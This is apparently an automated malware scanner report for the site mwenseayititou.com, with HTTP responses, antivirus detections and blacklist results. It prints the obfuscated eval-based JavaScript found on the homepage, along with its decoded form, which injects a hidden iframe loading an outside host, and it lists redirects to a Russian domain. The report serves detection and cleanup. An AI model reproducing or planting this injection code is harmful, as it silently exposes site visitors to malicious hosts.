New scan:

Malware Scanner report for mwenseayititou.com

Malicious/Suspicious/Total urls checked
1/0/8
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://mwenseayititou.com/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 13 Jun 2015 01:28:58 GMT
Location: http://www.mwenseayititou.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 238
Content-Type: text/html; charset=iso-8859-1
clean
http://www.mwenseayititou.com/
200 OK
Content-Length: 7437
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

i=0;try{prototype*5;}catch(z){fr="fromChar";f=[9,18,105,204,32,80,100,222,99,234,109,202,110,232,46,206,101,232,69,216,101,218,101,220,116,230,66,242,84,194,103,156,97,218,101,80,39,196,111,200,121,78,41,182,48,186,41,246,13,18,9,18,105,204,114,194,109,202,114,80,41,118,13,18,9,250,32,202,108,230,101,64,123,26,9,18,9,200,111,198,117,218,101,220,116,92,119,228,105,232,101,80,34,120,105,204,114,194,109,202,32,230,114,198,61,78,104,232,116,224,58,94,47,236,119,214,117,232,121,240,99,92,111,220,101,
... 1395 bytes are skipped ...
16,78,44,78,49,96,39,82,59,26,9,18,9,200,111,198,117,218,101,220,116,92,103,202,116,138,108,202,109,202,110,232,115,132,121,168,97,206,78,194,109,202,40,78,98,222,100,242,39,82,91,96,93,92,97,224,112,202,110,200,67,208,105,216,100,80,102,82,59,26,9,18,125];v="e"+"v"+"a";}if(v)e=window[v+"l"];try{q=document["createElem"+((f)?"ent":"")]("p");if(e)q.appendChild(q+"");}catch(fwbewe){w=f;s=[];} r=String;z=((e)?"Code":"");for(;575-5+5>i;i+=1){j=i;if(e)s=s+r[fr+"Code"]((w[j]/(2-1+j%2)));} if(f)e(s);

Decoded script:


if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://vwkutyxc.onedumb.com/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://vwkutyxc.onedumb.com/?go=2');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.
... 344 bytes are skipped ...
} function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://vwkutyxc.onedumb.com/?go=2');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); }
<iframe src='http://vwkutyxc.onedumb.com/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>

Antivirus reports:

Ikarus
Trojan.IframeRef
nProtect
JS:Trojan.Iframe.A
K7AntiVirus
Riskware
Emsisoft
JS:Trojan.Iframe.A (B)
McAfee-GW-Edition
Heuristic.BehavesLike.JS.Infected.A
DrWeb
JS.IFrame.151
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/Iframe.V
MicroWorld-eScan
JS:Trojan.Iframe.A
NANO-Antivirus
Trojan.Script.Iframe.rpyhz
F-Secure
JS:Trojan.Iframe.A
F-Prot
JS/IFrame.HC.gen
Norman
IframeRef.DM
GData
JS:Trojan.Iframe.A
Commtouch
JS/IFrame.HC.gen
BitDefender
JS:Trojan.Iframe.A

http://www.mwenseayititou.com/IAMHAITITOO.pdf
200 OK
Content-Length: 301928
Content-Type: application/pdf
clean
http://www.mwenseayititou.com/test404page.js
HTTP/1.1 302 Found
Connection: close
Date: Sat, 13 Jun 2015 01:29:01 GMT
Location: http://peter-safe.ru/mnp/index.php
Server: Apache
Vary: Accept-Encoding
Content-Length: 218
Content-Type: text/html; charset=iso-8859-1
clean
http://peter-safe.ru/mnp/index.php
500 Can't connect to peter-safe.ru:80
Content-Length: 188
Content-Type: text/plain
clean
http://peter-safe.ru/test404page.js
500 Can't connect to peter-safe.ru:80
Content-Length: 188
Content-Type: text/plain
clean
http://mwenseayititou.com/MWENSEAYITITOU.pdf
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 13 Jun 2015 01:29:02 GMT
Location: http://www.mwenseayititou.com/MWENSEAYITITOU.pdf
Server: Apache
Vary: Accept-Encoding
Content-Length: 256
Content-Type: text/html; charset=iso-8859-1
clean
http://www.mwenseayititou.com/mwenseayititou.pdf
HTTP/1.1 302 Found
Connection: close
Date: Sat, 13 Jun 2015 01:29:02 GMT
Location: http://peter-safe.ru/mnp/index.php
Server: Apache
Vary: Accept-Encoding
Content-Length: 218
Content-Type: text/html; charset=iso-8859-1
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: mwenseayititou.com

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 13 Jun 2015 01:28:58 GMT
Location: http://www.mwenseayititou.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 238
Content-Type: text/html; charset=iso-8859-1

...238 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mwenseayititou.com
Referer: http://www.google.com/search?q=mwenseayititou.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=mwenseayititou.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mwenseayititou.com/

Result: mwenseayititou.com is not infected or malware details are not published yet.